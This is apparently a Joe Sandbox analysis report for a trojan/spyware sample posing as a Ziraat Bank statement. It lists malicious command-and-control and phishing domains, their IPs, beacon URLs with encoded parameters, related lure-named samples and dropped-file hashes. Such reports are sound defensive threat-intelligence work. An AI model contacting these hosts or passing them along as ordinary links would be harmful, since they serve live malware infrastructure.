          http://www.bemmulher.online0%Avira URL Cloudsafe
          http://www.7dkjhk.com/ghii/100%Avira URL Cloudmalware
          http://www.sem-jobs.com0%Avira URL Cloudsafe
          http://www.ladybillplanet.com/ghii/100%Avira URL Cloudmalware
          http://www.yeah-go.com/ghii/0%Avira URL Cloudsafe
          http://www.wenzid4.top/ghii/100%Avira URL Cloudmalware
          http://www.energybig.xyz/ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gk6B8rCsM/9BrBFmoNQDax5Q2100%Avira URL Cloudmalware
          http://www.cutgang.net/ghii/?xMjnfN-Y=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgf0%Avira URL Cloudsafe
          http://www.genuineinsights.cloud100%Avira URL Cloudphishing
          http://www.genuineinsights.cloud/ghii/?xMjnfN-Y=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0g3xi7GVGpMQC8nL5ipoR7ehtO&P5V1e9=5El5vwlhmyt100%Avira URL Cloudmalware
          http://www.fluxgreenn.space/ghii/0%Avira URL Cloudsafe
          http://www.energybig.xyz100%Avira URL Cloudmalware
          http://www.genuineinsights.cloud/ghii/100%Avira URL Cloudmalware
          http://www.nortonseecurity.com0%Avira URL Cloudsafe
          http://www.hubyazilim.com0%Avira URL Cloudsafe
          http://www.ixirwholesale.xyz0%Avira URL Cloudsafe
          http://www.yeah-go.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.genuineinsights.cloud
          		66.96.162.149
          		truetrue
            		unknown
            cutgang.net
            		194.102.227.30
            		truetrue
              		unknown
              www.energybig.xyz
              		184.94.215.91
              		truetrue
                		unknown
                parkingpage.namecheap.com
                		198.54.117.215
                		truefalse
                  		high
                  www.wenzid4.top
                  		107.148.8.96
                  		truetrue
                    		unknown
                    www.octohoki.net
                    		unknown
                    		unknowntrue
                      		unknown
                      www.cutgang.net
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.octohoki.net/ghii/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.wenzid4.top/ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3OATx/e31Ge81BxjFPOt13FZGtrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.energybig.xyz/ghii/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.octohoki.net/ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoQK3x8J3agnpi0FJwMyByf64htrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.energybig.xyz/ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gk6B8rCsM/9BrBFmoNQDax5Q2true
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.genuineinsights.cloud/ghii/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.genuineinsights.cloud/ghii/?xMjnfN-Y=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0g3xi7GVGpMQC8nL5ipoR7ehtO&P5V1e9=5El5vwlhmyttrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.fluxgreenn.spaceexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/chrome_newtabwlanext.exe, 00000009.00000002.513480459.0000000003106000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                          		high
                          http://www.cutgang.net/ghii/explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=-912K03JO.9.drfalse
                            		high
                            http://www.hubyazilim.com/ghii/explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmptrue
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.wenzid4.toppOBexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.sem-jobs.com/ghii/explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://search.yahoo.com?fr=crmas_sfpfwlanext.exe, 00000009.00000002.513480459.0000000003106000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                              		high
                              http://www.cutgang.net/wlanext.exe, 00000009.00000002.513480459.0000000003085000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ixirwholesale.xyz/ghii/explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.cutgang.netexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.de-nagel.com/ghii/explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.nortonseecurity.com/ghii/explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.octohoki.netexplorer.exe, 00000003.00000002.523669774.00000000072B7000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.assilajamiart.com/ghii/explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.wenzid4.topexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.7dkjhk.comexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.de-nagel.comexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ladybillplanet.comexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.assilajamiart.comexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.searchvity.com/?dn=explorer.exe, 00000003.00000002.528851137.00000000152DC000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000009.00000002.515844706.000000000401C000.00000004.10000000.00040000.00000000.sdmptrue
                              • URL Reputation: malware
                              		unknown
                              http://www.bemmulher.online/ghii/explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000002.523892470.0000000007A84000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.270321034.0000000007A84000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://www.bemmulher.onlineexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icowlanext.exe, 00000009.00000002.513480459.0000000003106000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                                  		high
                                  http://www.7dkjhk.com/ghii/explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.sem-jobs.comexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.yeah-go.com/ghii/explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.energybig.xyzexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-912K03JO.9.drfalse
                                    		high
                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchwlanext.exe, 00000009.00000002.513480459.0000000003106000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                                      		high
                                      http://nsis.sf.net/NSIS_ErrorErrorT.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exefalse
                                        		high
                                        http://www.ladybillplanet.com/ghii/explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.cutgang.net/ghii/?xMjnfN-Y=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgfwlanext.exe, 00000009.00000002.516322379.00000000075D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=wlanext.exe, 00000009.00000002.513480459.0000000003106000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                                          		high
                                          https://ac.ecosia.org/autocomplete?q=-912K03JO.9.drfalse
                                            		high
                                            https://search.yahoo.com?fr=crmas_sfpwlanext.exe, 00000009.00000002.513480459.0000000003106000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                                              		high
                                              http://www.genuineinsights.cloudexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              http://www.wenzid4.top/ghii/explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.searchvity.com/explorer.exe, 00000003.00000002.528851137.00000000152DC000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000009.00000002.515844706.000000000401C000.00000004.10000000.00040000.00000000.sdmptrue
                                              • URL Reputation: malware
                                              		unknown
                                              http://www.fluxgreenn.space/ghii/explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ixirwholesale.xyzexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.yeah-go.comexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=-912K03JO.9.drfalse
                                                		high
                                                http://www.hubyazilim.comexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.nortonseecurity.comexplorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                66.96.162.149
                                                		www.genuineinsights.cloudUnited States
                                                		29873BIZLAND-SDUStrue
                                                107.148.8.96
                                                		www.wenzid4.topUnited States
                                                		54600PEGTECHINCUStrue
                                                194.102.227.30
                                                		cutgang.netRomania
                                                		12302VODAFONE_ROCharlesdeGaullenr15ROtrue
                                                198.54.117.215
                                                		parkingpage.namecheap.comUnited States
                                                		22612NAMECHEAP-NETUSfalse
                                                184.94.215.91
                                                		www.energybig.xyzUnited States
                                                		394896VXCHNGE-NC01UStrue

                                                General Information

                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                Analysis ID:808219
                                                Start date and time:2023-02-15 08:40:11 +01:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 11m 46s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:13
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample file name:T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/5@7/5
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 68.1% (good quality ratio 62.8%)
                                                • Quality average: 74.7%
                                                • Quality standard deviation: 31.9%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 58
                                                • Number of non-executed functions: 103
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                08:41:31API Interceptor601x Sleep call for process: explorer.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                66.96.162.149T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousBrowse
                                                • www.genuineinsights.cloud/ghii/?uyr=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0gyz2/IGepHjywiw==&IlOzNN=EyIBgfI12Z
                                                captain.exeGet hashmaliciousBrowse
                                                • www.genuineinsights.cloud/ghii/?5B=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0t5S24GXeXAGyBig==&Z-y-ON=FXxQJAlmPf
                                                file.exeGet hashmaliciousBrowse
                                                • www.genuineinsights.cloud/czni/
                                                0900664 MOHS Tender..jsGet hashmaliciousBrowse
                                                • www.genuineinsights.cloud/czni/?z8rul-n=06gIUCFIBOa1TNKOgihx1QaHEyCsoo2zVarqfXE1BGhN6bynIxp2kNvfG92v3asKvvgl0gKrl2tBRyImUhoMMpO0yMdYVRtJxA==&20=4xfPiv3RnE
                                                Jz2Mcq7OeM.exeGet hashmaliciousBrowse
                                                • www.cyber-secrets.com/bs48/?8p=T73Lxmf2cdAnJDHafhxdtihSqT3u8FEhyfZk1B+P3IbhlyI6ykukQU1NKSkndMam2QdS&t6=cL3h8z1
                                                SC51072208.jsGet hashmaliciousBrowse
                                                • www.saastainability.com/np8s/?GJBPX6D=j+xJ52kvZitq/xtkyo0xc4JYMsPCR5KOBwdQ4I795x9kDLbzkfoc0DQvNb1jlDl/rJvI5pCJTA==&p48T=LPJ0i0106BKpWjn
                                                Order_pdf.exeGet hashmaliciousBrowse
                                                • www.meta-medical.info/os16/?n2=DYzwLfRIR9dxuuAu+uePVd+l4oWgCCf6/msnr2nTY3vRZDvKZxdrJTZJK/NgIwfJJdbg&B6WP=s0Dxpn
                                                Drawing.exeGet hashmaliciousBrowse
                                                • www.meimatch.com/agq9/?QrHXkTu=tP9HocRI+pteplIHbT0HLt4RDxaTfiolU8mdhKJ2X4G5VRGVZ8atTjsJuKWZmRrUOCTL&y6Ah=eR-TJ
                                                Purchase Order 2890.exeGet hashmaliciousBrowse
                                                • www.7layerforensics.com/pqbu/?Czu=AG3UBL4Rv8apGfc9z5HpRCsF7+T6e94noVNQovUy5VDtnrgxU0LqtNFuXOW1XBadZlaF&qZX8=3fyt8XTxqnth9J80
                                                ORDER REMINDER.docGet hashmaliciousBrowse
                                                • www.yourhealth911.com/zaip/?r2JPlFDH=AvP92A8/qZNmTnLoCBeCkhnmO5atGwdNyFiXAUmJy3xVaGn6pjY/GRUzwwW5KPTu+rIw4Q==&Ozu8Z=qxoHsxEPs4u
                                                DHL.exeGet hashmaliciousBrowse
                                                • www.millionaireproducers.academy/ct6s/?VF=q4CSFUekex3hJlx7sD1eHsh+8I4+YUvALCWKhSwYfOyeahF6gvwn5NbuwPVBdbE8rjjd&9rFD=OFNt1hdXV
                                                DHL DOC ARRIVAL#20008.exeGet hashmaliciousBrowse
                                                • www.millionaireproducers.academy/ct6s/?UVytsN=q4CSFUekex3hJlx7sD1eHsh+8I4+YUvALCWKhSwYfOyeahF6gvwn5NbuwM5RBqYHsWKMYRAZcQ==&vZj07=2dvtLrx
                                                CamScanner 24.05.2021 10.01.exeGet hashmaliciousBrowse
                                                • www.cuisinegastro.com/ainq/?mlvx=PmAOBCt72TUsl1tl9pxLQaQwYF0z+7XuEm9dzbF10QL1PYQtGTMSxhvCAnLPx1GbLTKB&Nji0Xf=8p7tvpAP
                                                Rio International LLC URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                                • www.lashicorn.com/o86d/?GPTl=LtWPN18vqP/M4yh0ZsjcAanb/FX8gYM7ik5nHFfw5YbAj08iaY4oyfm2nypr48FazvRfJkokWw==&BlB=O2JthfYxo
                                                TT COPY (39.750,00 USD).exeGet hashmaliciousBrowse
                                                • www.lashicorn.com/o86d/?8p-LVP8p=LtWPN18vqP/M4yh0ZsjcAanb/FX8gYM7ik5nHFfw5YbAj08iaY4oyfm2nylS0dpakpNO&bj=VTWpjpVhfN0xwFd
                                                SA-NQAW12n-NC9W03-pdf.exeGet hashmaliciousBrowse
                                                • www.businessdebunked.com/uwec/?Rl4=YVFTx4yh&GFQl9jnp=lRACBwmkZqYcQau83twu8YuziEgkNnCdZxTIFBHxLE6LGZL7VxiLJpRHk1NsTEAB69Go
                                                salescontractv2draft.exeGet hashmaliciousBrowse
                                                • www.businessdebunked.com/uwec/?5jiPPdy=lRACBwmkZqYcQau83twu8YuziEgkNnCdZxTIFBHxLE6LGZL7VxiLJpRHk2h8P1c69Iv52CTXYA==&KneXK=hrtTrR-Hj2Hxpx6p
                                                purchase order#034.exeGet hashmaliciousBrowse
                                                • www.theprincipleofcare.com/8ufh/?EzrthRhp=b4anfX3j1Cd1U1bEuIELcJwjl/oQZr8FE+dkTVYTc1ms1Dioa+WHsfL/O0K6Dsv/KSZf&ojo0f=SzrhU8
                                                RQP_10378065.exeGet hashmaliciousBrowse
                                                • www.360holdingsbh.com/mt6e/?rVXHzf=lnRpL0YpGPdD&mtxhc=OVrx0BWP6JW8+Cj93m7Y0AlMTQL3X0BHDEpXz4H2IlKjrF3bfPHZD5ruVCX9BHJ+FdiC3JhNFg==
                                                IMG_7189012.exeGet hashmaliciousBrowse
                                                • www.360holdingsbh.com/mt6e/?DVBl=OVrx0BWP6JW8+Cj93m7Y0AlMTQL3X0BHDEpXz4H2IlKjrF3bfPHZD5ruVCb9SXF9cNiU&T8SH=pFNpKT28jFN454KP

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                www.energybig.xyzT.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousBrowse
                                                • 184.94.215.91
                                                captain.exeGet hashmaliciousBrowse
                                                • 184.94.215.91
                                                love pas.exeGet hashmaliciousBrowse
                                                • 184.94.215.91
                                                Halkbank_Ekstre_20191102_073809_405251-PDF.exeGet hashmaliciousBrowse
                                                • 184.94.215.91
                                                www.genuineinsights.cloudT.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousBrowse
                                                • 66.96.162.149
                                                captain.exeGet hashmaliciousBrowse
                                                • 66.96.162.149
                                                file.exeGet hashmaliciousBrowse
                                                • 66.96.162.149
                                                0900664 MOHS Tender..jsGet hashmaliciousBrowse
                                                • 66.96.162.149

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                PEGTECHINCUSZiraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                                • 154.195.83.1
                                                http://kickboxingathome.comGet hashmaliciousBrowse
                                                • 104.219.208.2
                                                http://137.175.17.190/jawsGet hashmaliciousBrowse
                                                • 137.175.17.190
                                                T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousBrowse
                                                • 107.148.8.96
                                                Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                                • 154.195.83.1
                                                captain.exeGet hashmaliciousBrowse
                                                • 107.148.8.96
                                                TRANSFER CONFIRMATION.exeGet hashmaliciousBrowse
                                                • 198.2.192.82
                                                4iLDIlbK8X.elfGet hashmaliciousBrowse
                                                • 45.205.88.130
                                                TT Swift($42,072)2.2.23.exeGet hashmaliciousBrowse
                                                • 107.149.76.98
                                                y2OSL6rKkW.exeGet hashmaliciousBrowse
                                                • 142.4.98.152
                                                6TY2Qkw9KV.exeGet hashmaliciousBrowse
                                                • 107.148.8.96
                                                Pyt5lqAgHP.elfGet hashmaliciousBrowse
                                                • 108.186.132.182
                                                love pas.exeGet hashmaliciousBrowse
                                                • 107.148.8.96
                                                mgAj1bD1FN.elfGet hashmaliciousBrowse
                                                • 156.247.76.126
                                                DHL Invoice Details_pdf.exeGet hashmaliciousBrowse
                                                • 107.149.195.181
                                                some one.exeGet hashmaliciousBrowse
                                                • 107.148.8.96
                                                Halkbank_Ekstre_20191102_073809_405251-PDF.exeGet hashmaliciousBrowse
                                                • 107.148.8.96
                                                DHL Notification_pdf.exeGet hashmaliciousBrowse
                                                • 107.149.195.181
                                                SO#69055.exeGet hashmaliciousBrowse
                                                • 107.149.255.14
                                                GqM7ZJDz69.elfGet hashmaliciousBrowse
                                                • 104.233.188.217
                                                BIZLAND-SDUSkftt2DEAWT8UMcm.exeGet hashmaliciousBrowse
                                                • 66.96.160.129
                                                T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousBrowse
                                                • 66.96.162.149
                                                33040117281.exeGet hashmaliciousBrowse
                                                • 66.96.147.114
                                                Purchase Order Form.exeGet hashmaliciousBrowse
                                                • 65.254.248.134
                                                Lv8QWUVq3P.exeGet hashmaliciousBrowse
                                                • 66.96.162.135
                                                captain.exeGet hashmaliciousBrowse
                                                • 66.96.162.149
                                                cnf13429226.vbsGet hashmaliciousBrowse
                                                • 66.96.162.135
                                                http://img.youtube.com.dollhousedelight.com/.mods/bbb.phpGet hashmaliciousBrowse
                                                • 66.96.162.133
                                                AnQO5F8pVs.exeGet hashmaliciousBrowse
                                                • 66.96.162.128
                                                fWikJEXL2p.elfGet hashmaliciousBrowse
                                                • 207.148.241.180
                                                #U03a0#U03b1#U03c1#U03b1#U03b3#U03b3#U03b5#U03bb#U03af#U03b1 0843.exeGet hashmaliciousBrowse
                                                • 66.96.160.155
                                                file.exeGet hashmaliciousBrowse
                                                • 66.96.162.149
                                                hIMJgp4RfW.exeGet hashmaliciousBrowse
                                                • 66.96.147.160
                                                0900664 MOHS Tender..jsGet hashmaliciousBrowse
                                                • 66.96.162.149
                                                order.exeGet hashmaliciousBrowse
                                                • 66.96.162.129
                                                DHL _09576464.exeGet hashmaliciousBrowse
                                                • 66.96.160.155
                                                DHL Express Shipping DOC.exeGet hashmaliciousBrowse
                                                • 66.96.147.160
                                                FedEx Shipping Documents.exeGet hashmaliciousBrowse
                                                • 66.96.147.160
                                                KEYENCE AS532 TW835.exeGet hashmaliciousBrowse
                                                • 66.96.160.155
                                                pla#U0107anje.exeGet hashmaliciousBrowse
                                                • 66.96.163.136

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\-912K03JO

                                                Download File
                                                Process:C:\Windows\SysWOW64\wlanext.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                Category:modified
                                                Size (bytes):94208
                                                Entropy (8bit):1.2889923589460437
                                                Encrypted:false
                                                SSDEEP:192:Qo1/8dpUXbSzTPJP/6oVuss8Ewn7PrH944:QS/inXrVuss8Ewn7b944
                                                MD5:7901DD9DF50A993306401B7360977746
                                                SHA1:E5BA33E47A3A76CC009EC1D63C5D1A810BE40521
                                                SHA-256:1019C8ADA4DA9DEF665F59DB191CA3A613F954C12813BE5907E1F5CB91C09BE9
                                                SHA-512:90C785D22D0D7F5DA90D52B14010719A5554BB5A7F0029C3F4E11A97AD72A7A600D846174C7B40D47D24B0995CDBAC21E255EC63AC9C07CF6E106572EA181DD5
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\nsfD1A.tmp

                                                Download File
                                                Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):367911
                                                Entropy (8bit):7.525255780260812
                                                Encrypted:false
                                                SSDEEP:6144:/pfGijQ4KO7P7VrqEOkyOVUdnMXHD/MmJcfSQ3ZM/F1pEmi:ZJj3K2P7MEszSYma68e1pE
                                                MD5:BEF07EC204E47A9FED9CE296E43C23A8
                                                SHA1:81B4963AF5114E7B3F2CE1E5F34FD4EBB98AE2D8
                                                SHA-256:2370C31372DD27C2E5EB7F1A355B891D71175FF257512CF57D5A7A14291226D9
                                                SHA-512:5A2A5FCB494BFFACE5ECCB2B19AAA65DE2F087A9893BBACDF480822C6FA82004B303ABB8B91F1A4A692CEBDEDF996E0A99F5624B4206FEE509165793F9E4C461
                                                Malicious:false
                                                Reputation:low
                                                Preview:. ......,...................].................... ..............................................................................!...........................................................................................................................................................G...................j...........................................................................................................................................=...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:modified
                                                Size (bytes):143360
                                                Entropy (8bit):6.284693009364011
                                                Encrypted:false
                                                SSDEEP:3072:OmJzYfS9Mme73ZMhVF1pv7m9tVQvIE8Zi:OmJcfSQ3ZM/F1pEmi
                                                MD5:7719839B64AEF3F35ABECB784C0BDB46
                                                SHA1:9EC0C959D4F3CF17C1E18CFD7C9FCF26909DBD0D
                                                SHA-256:41B47539D9346C769795483939F233FC59216F39215A2AB8FF01D6042E66A18E
                                                SHA-512:B07F8B56253924FF7BE8A626C74D631B4201E55E1E208575B2F8BFAABA7CB8C926A8488EE0DC12C3697EBE53B8751ADD8B09179C6A17F52A3D0F393C32A0D69D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 13%
                                                Reputation:low
